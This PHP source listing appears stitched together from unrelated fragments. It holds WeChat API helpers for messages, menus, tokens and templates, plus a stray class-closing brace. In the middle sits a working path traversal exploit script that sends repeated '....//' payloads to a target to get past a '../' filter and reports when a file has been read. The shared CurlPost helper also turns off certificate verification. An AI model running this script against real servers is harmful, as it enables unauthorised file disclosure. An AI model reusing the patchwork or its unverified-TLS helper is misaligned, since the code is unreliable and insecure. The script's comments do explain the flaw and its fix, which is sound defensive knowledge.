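/**
 * Send a WeChat "news" customer-service message containing one article card.
 *
 * The recipient is shown as '******' in this listing, so the way $uid maps to
 * a WeChat recipient cannot be determined from the visible code.
 *
 * The request body is produced with json_encode() instead of string
 * concatenation, so a quote, backslash or control character in any argument
 * can no longer break out of its JSON string and alter the message structure.
 *
 * @param int|string $uid         Site user id; cast to int, not otherwise used in the visible code.
 * @param string     $title       Article title, GBK-encoded.
 * @param string     $description Article summary, GBK-encoded.
 * @param string     $url         Link opened when the card is tapped.
 * @param string     $picurl      Thumbnail image URL.
 * @return void
 */
function wx_message($uid, $title, $description, $url, $picurl)
{
    $uid = intval($uid);
    $Token = getToken($this->config);
    $WxUrl = 'https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=' . $Token;
    $Touser = '******';

    // iconv() returns false on an invalid GBK sequence; the cast keeps the
    // previous behaviour of sending an empty string in that case.
    $Message = array(
        'touser' => $Touser,
        'msgtype' => 'news',
        'news' => array(
            'articles' => array(
                array(
                    'title' => (string) iconv('gbk', 'utf-8', $title),
                    'description' => (string) iconv('gbk', 'utf-8', $description),
                    'url' => (string) $url,
                    'picurl' => (string) $picurl,
                ),
            ),
        ),
    );

    // The JSON_UNESCAPED_* flags (PHP 5.4+) keep UTF-8 text and slashes literal,
    // matching the bytes the concatenated version used to send.
    $Data = json_encode($Message, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES);
    if ($Data === false) {
        // A value was not valid UTF-8 (for example a non-ASCII $url); do not
        // send a malformed body.
        return;
    }

    CurlPost($WxUrl, $Data);
}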
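/*
 * Command-line check for a path traversal weakness in a file parameter.
 *
 *   argv[1]  URL of the endpoint under test
 *   argv[2]  "param:file" - POST parameter name and the file path to request
 *   argv[3]  marker string expected in the response when the file was read
 *
 * What it demonstrates: a filter that deletes "../" from input in a single
 * pass turns "....//" into "../", so the input still climbs out of the
 * intended directory. The server-side fix is to canonicalise the resulting
 * path (e.g. realpath()) and reject anything outside the allowed base
 * directory, not to strip substrings. In request logs, repeated "....//"
 * sequences in a parameter value are a useful indicator of this probing.
 */
$url = $argv[1];
$data = $argv[2];
$needle = $argv[3];

/**
 * POST $data to $url and return the raw response.
 *
 * CURLOPT_HEADER is on, so the returned string holds the response headers
 * followed by the body.
 *
 * NOTE(review): CURLOPT_SSL_VERIFYPEER is disabled, so the server certificate
 * is not validated. Do not reuse this helper for requests that carry
 * credentials or tokens without turning verification back on.
 *
 * @param string       $url  Target URL.
 * @param array|string $data POST fields.
 * @return string|false Headers plus body, or false when the transfer fails.
 */
function CurlPost($url = 'localhost', $data = array())
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 50);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);

    // The original returned before curl_close(), so the handle was never
    // released; capture the result first, then close.
    $response = curl_exec($ch);
    curl_close($ch);

    return $response;
}

list($param, $file) = explode(':', $data);

$DataToPost = array();
$FilterBypassing = '....//';

// Up to ten attempts, each one directory level deeper than the last.
for ($i = 0; $i < 10; $i++) {
    $DataToPost[$param] = $FilterBypassing . $file;
    $response = CurlPost($url, $DataToPost);

    // The marker is searched in headers and body alike (CURLOPT_HEADER is on).
    if (strstr($response, $needle) !== FALSE) {
        echo $response;
        echo "\n\nExploited successfully!\n";
        echo 'Payload: ', $DataToPost[$param], "\n\n\n";
        die;
    }

    $FilterBypassing .= '....//';
}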
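/**
 * Rebuild the WeChat custom menu from the `wxnav` table and push it to the API.
 *
 * Rows with keyid '0' become top-level buttons; every other row is attached as
 * a sub-button to the top-level row whose id equals its keyid. Only sub-buttons
 * of type "click" and "view" are sent.
 *
 * The menu JSON is produced with json_encode() instead of string
 * concatenation. Names, keys and URLs come from the database, and a quote or
 * backslash in any of them previously broke the document or changed its
 * structure; an unsupported sub-button type also left a stray comma behind.
 *
 * Output: echoes 1 on success or 2 on failure and ends the request. Nothing is
 * echoed when the query does not return an array.
 *
 * @return void
 */
public function creat_action()
{
    $list = $this->obj->DB_select_all("wxnav", "1 ORDER BY `keyid` ASC,`sort` ASC");

    if (is_array($list)) {
        // Initialised up front so an empty table no longer iterates an undefined variable.
        $navlist = array();
        foreach ($list as $value) {
            if ($value['keyid'] == '0') {
                $navlist[$value['id']] = $value;
            }
        }

        foreach ($list as $val) {
            foreach ($navlist as $key => $v) {
                if ($v['id'] == $val['keyid']) {
                    $navlist[$key]['list'][] = $val;
                }
            }
        }

        $Buttons = array();
        foreach ($navlist as $value) {
            $SubButtons = array();

            // A top-level row without children has no 'list' key at all.
            if (isset($value['list']) && is_array($value['list'])) {
                foreach ($value['list'] as $v) {
                    if ($v['type'] == 'click') {
                        $SubButtons[] = array(
                            'type' => 'click',
                            'name' => (string) iconv('gbk', 'utf-8', $v['name']),
                            'key' => (string) iconv('gbk', 'utf-8', $v['key']),
                        );
                    } elseif ($v['type'] == 'view') {
                        $SubButtons[] = array(
                            'type' => 'view',
                            'name' => (string) iconv('gbk', 'utf-8', $v['name']),
                            'url' => (string) $v['url'],
                        );
                    }
                    // Any other type is skipped, as before.
                }
            }

            $Buttons[] = array(
                'name' => (string) iconv('gbk', 'utf-8', $value['name']),
                'sub_button' => $SubButtons,
            );
        }

        // The JSON_UNESCAPED_* flags (PHP 5.4+) keep UTF-8 text and slashes
        // literal, matching the bytes the concatenated version produced.
        $CreatNav = json_encode(array('button' => $Buttons), JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES);
        if ($CreatNav === false) {
            // Stop before the live menu is deleted if no valid payload exists.
            echo 2;
            die;
        }

        $Token = getToken($this->config);

        $DelUrl = 'https://api.weixin.qq.com/cgi-bin/menu/delete?access_token=' . $Token;
        CurlPost($DelUrl);

        $Url = "https://api.weixin.qq.com/cgi-bin/menu/create?access_token=" . $Token;
        $result = CurlPost($Url, $CreatNav);
        $Info = json_decode($result);

        // json_decode() yields null for a failed or non-JSON reply; treat that as failure.
        $Succeeded = is_object($Info)
            && ((isset($Info->errcode) && $Info->errcode == '0')
                || (isset($Info->errmsg) && $Info->errmsg == 'ok'));

        if ($Succeeded) {
            echo 1;
            die;
        } else {
            echo 2;
            die;
        }
    }
}
} // closes the enclosing class, whose header is outside this excerpt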
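/**
 * Return a WeChat API access token, refreshing it when the cached one is old.
 *
 * The cached token in $config['token'] is reused while it is at most 7000
 * seconds old according to $config['token_time']. Otherwise a new token is
 * requested with the app id and app secret, stored back into the config file
 * through made_web(), and returned.
 *
 * A reply that carries no access_token (transport failure, non-JSON body, API
 * error) is no longer written to the config file. Previously an empty token
 * was saved with a fresh timestamp and then served as "valid" until the cache
 * window ran out.
 *
 * NOTE(review): the token is persisted to config.php next to the app secret;
 * confirm that file is not readable through the web server.
 *
 * @param array $config Keys read: token, token_time, wx_appid, wx_appsecret.
 * @return string|null The access token, or null when a refresh failed.
 */
function getToken($config)
{
    $Token = isset($config['token']) ? $config['token'] : null;
    $TokenTime = isset($config['token_time']) ? intval($config['token_time']) : 0;

    if (time() - $TokenTime <= 7000) {
        return $Token;
    }

    // urlencode() keeps the query string well-formed whatever the config holds.
    $Url = 'https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid='
        . urlencode($config['wx_appid'])
        . '&secret=' . urlencode($config['wx_appsecret']);

    $CurlReturn = CurlPost($Url);
    $Reply = json_decode($CurlReturn);

    if (!is_object($Reply) || empty($Reply->access_token)) {
        // Leave the stored config untouched so the next call retries.
        return null;
    }

    $config['token'] = $Reply->access_token;
    $config['token_time'] = time();
    made_web(PLUS_PATH . "config.php", ArrayToString($config), "config");

    return $config['token'];
}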
/**
 * Send a WeChat template message.
 *
 * Reads the global $config to obtain an access token, then POSTs the
 * JSON-encoded template to the template/send endpoint. The reply is decoded
 * but neither inspected nor returned, so callers cannot tell whether delivery
 * succeeded.
 *
 * @param string $wxid   Recipient identifier placed in "touser".
 * @param string $tempid Template id placed in "template_id".
 * @param string $url    Link attached to the message.
 * @param array  $data   Template field values placed in "data".
 * @return void
 */
function sendWxTemplate($wxid, $tempid, $url, $data)
{
    global $config;

    $endpoint = 'https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=' . getToken($config);

    $payload = json_encode(
        array(
            "touser" => $wxid,
            "template_id" => $tempid,
            "url" => $url,
            "topcolor" => "#FF0000",
            "data" => $data,
        )
    );

    $reply = CurlPost($endpoint, $payload);

    // Decoded for parity with the original; the value is not used afterwards.
    $decodedReply = json_decode($reply);
}